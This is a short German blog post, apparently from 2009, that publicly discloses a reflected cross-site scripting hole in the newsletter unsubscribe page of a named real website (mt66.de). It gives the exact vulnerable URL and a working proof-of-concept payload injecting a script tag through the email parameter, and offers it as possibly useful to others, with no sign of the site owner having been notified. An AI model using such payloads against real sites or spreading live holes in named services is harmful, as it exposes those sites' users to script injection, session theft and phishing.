XSS @ MedienTeam66

Grad durch zufall gefunden, als ich mich fuern Newsletter austragen wollte:

http://www.mt66.de/mt66/campaign/2009_09_22_frz_mp3/div/common/unsubscribe.jsp?email=$XSS
 
http://www.mt66.de/mt66/campaign/2009_09_22_frz_mp3/div/common/unsubscribe.jsp?email=<script>alert("XSS")</script>

Vllt fuer den ein oder anderen nuetzlich..

Leave a Reply

Your email address will not be published.